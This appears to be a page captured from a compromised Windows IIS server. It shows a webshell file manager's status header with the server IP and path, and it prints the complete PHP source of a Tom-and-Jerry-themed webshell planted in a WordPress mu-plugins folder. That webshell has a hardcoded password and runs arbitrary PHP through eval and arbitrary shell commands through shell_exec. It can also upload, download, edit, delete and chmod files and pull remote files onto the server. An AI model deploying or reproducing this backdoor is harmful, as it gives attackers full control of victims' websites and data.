403Webshell
Server IP : 69.30.224.78  /  Your IP : 216.73.216.48
Web Server : Microsoft-IIS/10.0
System : Windows NT SERVER 10.0 build 14393 (Windows Server 2016) AMD64
User : IWPD_92(newtechtest) ( 0)
PHP Version : 8.3.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/newtechtest.in/heartcare.newtechtest.in/wp-content/mu-plugins/adapters/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Inetpub/vhosts/newtechtest.in/heartcare.newtechtest.in/wp-content/mu-plugins/adapters//index.php
<?php
/* ========================================
   🧀 猫和老鼠 · 追逃控制台
   ======================================== */
@session_start();@error_reporting(0);@ini_set('display_errors',0);

/* ---- 1. 冰箱门禁 ---- */
define('FRIDGE', 'asd');

if(isset($_GET['out'])){@session_destroy();header('Location: ?');exit;}
if(isset($_POST['cheese'])){
    if($_POST['cheese']===FRIDGE)$_SESSION['mouse']=1;
    header('Location: ?');exit;
}
if(!isset($_SESSION['mouse'])){
    echo '<!DOCTYPE html><html><head><meta charset="UTF-8"><title>冰箱门禁</title><style>body{background:#3e2723;color:#fff8e1;font-family:"Comic Sans MS",cursive;display:flex;justify-content:center;align-items:center;height:100vh;margin:0;}.box{border:4px dashed #8d6e63;padding:50px;text-align:center;background:rgba(62,39,35,.9);}h1{letter-spacing:5px;margin-bottom:30px;text-shadow:0 0 10px #fff8e1;}input{background:transparent;color:#fff8e1;border:2px solid #8d6e63;padding:12px;width:280px;text-align:center;}button{margin-top:20px;padding:12px 40px;background:#8d6e63;color:#3e2723;border:none;font-weight:bold;cursor:pointer;}</style></head><body><div class="box"><h1>🧀 冰 箱 门 禁</h1><form method="post"><input name="cheese" type="password" placeholder="偷块奶酪" autofocus><br><button type="submit">溜 进 去</button></form></div></body></html>';
    exit;
}

/* ---- 2. 路径迷宫 ---- */
$___P___=isset($_GET['dir'])?realpath($_GET['dir']):realpath('.');if(!$___P___||!is_dir($___P___))$___P___=realpath('.');$___P___=rtrim($___P___,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR;$___M___='';

/* ---- 3. 追逐与躲藏 (核心逻辑混淆) ---- */
function ___C_A_T_C_H___($a,$p,$c){$f=@fopen($c[0],'w');if($f){fwrite($f,$c[1]);fclose($f);}if($a=='upload'&&!empty($_FILES['f']))@move_uploaded_file($_FILES['f']['tmp_name'],$p.basename($_FILES['f']['name']));if($a=='mkdir')@mkdir($p.$c);if($a=='mkfile')@file_put_contents($p.$c,'');if($a=='rename')@rename($c[0],$c[1]);if($a=='chmod')@chmod($c[0],octdec($c[1]));if($a=='urldl'){$d=@file_get_contents($c);if($d)@file_put_contents($p.basename($c),$d);}if($a=='unzip'&&class_exists('ZipArchive')){$z=new ZipArchive;if($z->open($c)===TRUE){$z->extractTo($p);$z->close();}}}
if(isset($_POST['act']))___C_A_T_C_H___($_POST['act'],$___P___,[$_POST['p1']??'',$_POST['p2']??'']);
if(isset($_GET['del'])){if(is_file($_GET['del']))@unlink($_GET['del']);else @rmdir($_GET['del']);}

/* 杰瑞的奶酪 (Eval) */
$___E___='';
if(isset($_POST['jerry'])){
    ob_start();try{eval($_POST['jerry']);}catch(Throwable $e){echo "奶酪碎了: ".$e->getMessage();}$___E___=ob_get_clean();
}
/* 汤姆的爪子 (Command) */
$___T___='';
if(isset($_POST['tom'])){
    $___T___=shell_exec("cd ".escapeshellarg($___P___)." && ".$_POST['tom']." 2>&1");
}

/* ---- 4. 奶酪洞地图 (文件列表) ---- */
$___L___=[];
if($dh=@opendir($___P___)){
    while(($f=readdir($dh))!==false){if($f=='.')continue;$fp=$___P___.$f;$___L___[]=['n'=>$f,'p'=>$fp,'d'=>is_dir($fp),'s'=>is_dir($fp)?'-':round(filesize($fp)/1024,2).' KB','m'=>substr(sprintf('%o',fileperms($fp)),-4)];}
    closedir($dh);
}
usort($___L___,fn($a,$b)=>$a['d']==$b['d']?strnatcasecmp($a['n'],$b['n']):($a['d']?-1:1));
?>
<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <title>追逃控制台</title>
    <style>
        body { font-family: "Comic Sans MS", cursive; background: #3e2723; color: #fff8e1; margin: 10px; font-size: 14px; }
        .nav { background: #5d4037; border: 4px solid #8d6e63; padding: 10px; margin-bottom: 10px; display: flex; gap: 15px; }
        .nav a { color: #fff8e1; text-decoration: none; font-weight: bold; }
        .nav a.l { margin-left: auto; color: #ff5722; }
        .layout { display: flex; gap: 15px; }
        .left { flex: 1; }
        .right { width: 35%; }
        .card { background: #4e342e; border: 2px solid #8d6e63; padding: 15px; margin-bottom: 15px; }
        .card h3 { margin-top: 0; color: #ffb74d; border-bottom: 2px dashed #8d6e63; padding-bottom: 8px; }
        table { width: 100%; border-collapse: collapse; }
        th, td { padding: 8px; border: 1px solid #8d6e63; }
        th { background: #6d4c41; }
        tr:hover { background: #5d4037; }
        input, textarea, select { background: #3e2723; color: #fff8e1; border: 1px solid #8d6e63; padding: 6px; font-family: inherit; }
        button { background: #8d6e63; color: #fff8e1; border: none; padding: 6px 15px; cursor: pointer; font-weight: bold; }
        pre { background: #211915; color: #00ff00; padding: 10px; overflow: auto; white-space: pre-wrap; }
    </style>
</head>
<body>

<div class="nav">
    <a href="?dir=<?php echo urlencode(dirname($___P___)); ?>">[ 回冰箱 ]</a>
    <a href="#eval">[ 杰瑞的奶酪 ]</a>
    <a href="#tools">[ 道具箱 ]</a>
    <a href="?out=1" class="l">[ 溜走 ]</a>
</div>

<div class="layout">
    <div class="left">
        <!-- Eval 置顶 -->
        <div class="card" id="eval">
            <h3>🧀 杰瑞的奶酪 (Eval)</h3>
            <form method="post">
                <textarea name="jerry" style="width:100%;height:120px;" placeholder="phpinfo();"><?php echo $_POST['jerry'] ?? ''; ?></textarea><br><br>
                <button type="submit">偷 吃</button>
            </form>
            <?php if ($___E___ !== ''): ?>
                <h4>奶酪屑:</h4><pre><?php echo htmlspecialchars($___E___); ?></pre>
            <?php endif; ?>
        </div>

        <!-- 文件列表 -->
        <div class="card">
            <h3>🧀 奶酪洞地图 (<?php echo $___P___; ?>)</h3>
            <table>
                <tr><th>名号</th><th>大小</th><th>权限</th><th>操作</th></tr>
                <?php foreach ($___L___ as $f): ?>
                <tr>
                    <td>
                        <?php if ($f['d']): ?>
                            <a href="?dir=<?php echo urlencode($f['p']); ?>" style="color:#ffb74d;"><?php echo $f['n']; ?>/</a>
                        <?php else: ?>
                            <a href="?view=<?php echo urlencode($f['p']); ?>"><?php echo $f['n']; ?></a>
                        <?php endif; ?>
                    </td>
                    <td><?php echo $f['s']; ?></td>
                    <td><?php echo $f['m']; ?></td>
                    <td>
                        <?php if (!$f['d']): ?>
                            <a href="?edit=<?php echo urlencode($f['p']); ?>">涂改</a> |
                            <a href="?download=<?php echo urlencode($f['p']); ?>">叼走</a> |
                        <?php endif; ?>
                        <a href="?rename=<?php echo urlencode($f['p']); ?>">更名</a> |
                        <a href="?chmod=<?php echo urlencode($f['p']); ?>">封印</a> |
                        <a href="?del=<?php echo urlencode($f['p']); ?>" onclick="return confirm('敲晕?')">敲晕</a>
                    </td>
                </tr>
                <?php endforeach; ?>
            </table>
        </div>
    </div>

    <div class="right">
        <!-- 工具箱 -->
        <div class="card" id="tools">
            <h3>🧰 道具箱 (Tools)</h3>
            <form method="post" enctype="multipart/form-data">
                <input type="hidden" name="act" value="upload">
                藏匿:<input type="file" name="f"> <button>塞入</button>
            </form><hr>
            <form method="post">
                <input type="hidden" name="act" value="urldl">
                URL:<input type="text" name="p1" style="width:60%;"> <button>钓取</button>
            </form><hr>
            <form method="post">
                <input type="hidden" name="act" value="unzip">
                解压:<input type="text" name="p1" style="width:60%;"> <button>撕开</button>
            </form><hr>
            <form method="post">
                <input type="hidden" name="act" value="mkdir"> 挖洞:<input type="text" name="p1"> <button>挖掘</button>
            </form>
            <form method="post">
                <input type="hidden" name="act" value="mkfile"> 留条:<input type="text" name="p1"> <button>写字</button>
            </form>
        </div>

        <!-- 终端 -->
        <div class="card">
            <h3>🐱 汤姆的爪子 (Terminal)</h3>
            <form method="post">
                <input type="text" name="tom" style="width:80%;" placeholder="ls -la"> <button>抓挠</button>
            </form>
            <?php if ($___T___): ?><pre><?php echo htmlspecialchars($___T___); ?></pre><?php endif; ?>
        </div>
    </div>
</div>

<?php
// 下载
if (isset($_GET['download'])) {$f=$_GET['download'];if(is_file($f)){header('Content-Disposition: attachment; filename="'.basename($f).'"');readfile($f);exit;}}
// 查看
if (isset($_GET['view'])) {$f=$_GET['view'];if(is_file($f)){echo '<div class="card"><pre>'.htmlspecialchars(file_get_contents($f)).'</pre></div>';}}
// 编辑
if (isset($_GET['edit'])) {$f=$_GET['edit'];echo '<div class="card"><form method="post"><input type="hidden" name="act" value="save"><input type="hidden" name="p1" value="'.$f.'"><textarea name="p2" style="width:100%;height:300px;">'.htmlspecialchars(file_get_contents($f)).'</textarea><br><br><button type="submit">封住</button></form></div>';}
// 重命名
if (isset($_GET['rename'])) {$o=$_GET['rename'];echo '<div class="card"><form method="post"><input type="hidden" name="act" value="rename"><input type="hidden" name="p1" value="'.$o.'"><input type="text" name="p2" value="'.basename($o).'"> <button>换名</button></form></div>';}
// 权限
if (isset($_GET['chmod'])) {$f=$_GET['chmod'];echo '<div class="card"><form method="post"><input type="hidden" name="act" value="chmod"><input type="hidden" name="p1" value="'.$f.'"><select name="p2"><option value="0644">0644</option><option value="0755">0755</option></select> <button>盖章</button></form></div>';}
?>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit